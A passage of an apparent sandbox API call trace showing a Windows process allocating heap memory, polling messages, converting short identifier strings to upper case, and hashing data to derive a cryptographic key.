lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.529] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.529] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.530] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.530] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.530] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.530] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.530] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.531] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.531] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0188.531] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.531] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.531] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.531] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.532] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.532] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.532] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.532] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.532] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.533] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.533] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.533] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.533] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.533] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.533] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0188.534] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.534] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.534] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.535] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.535] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.535] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.535] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.535] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.536] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.536] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.536] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.537] CryptCreateHash (in: hProv=0xaa3868, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0188.537] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.538] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.538] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.538] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.538] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0188.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.539] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.539] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.539] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.539] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0188.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.540] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.540] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.540] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.540] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.540] CryptHashData (hHash=0xaa58a0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0188.540] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.540] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.540] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.540] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.540] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.540] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.540] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.540] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.540] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.540] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.540] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.541] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.541] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.541] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.541] CryptDeriveKey (in: hProv=0xaa3868, Algid=0x6601, hBaseData=0xaa58a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 